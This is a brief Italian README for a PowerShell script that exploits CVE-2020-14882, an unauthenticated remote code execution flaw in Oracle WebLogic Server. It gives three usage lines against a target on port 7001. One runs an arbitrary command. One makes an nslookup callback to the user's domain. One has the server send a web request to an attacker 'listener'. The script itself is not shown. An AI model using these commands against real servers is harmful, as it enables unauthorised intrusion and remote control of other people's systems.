
CVE-2020-14882 riscritto in PowerShell
Questo script PowerShell sfrutta CVE-2020-14882 per ottenere l'esecuzione di codice in remoto non autenticata sulle versioni di Oracle WebLogic Server:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'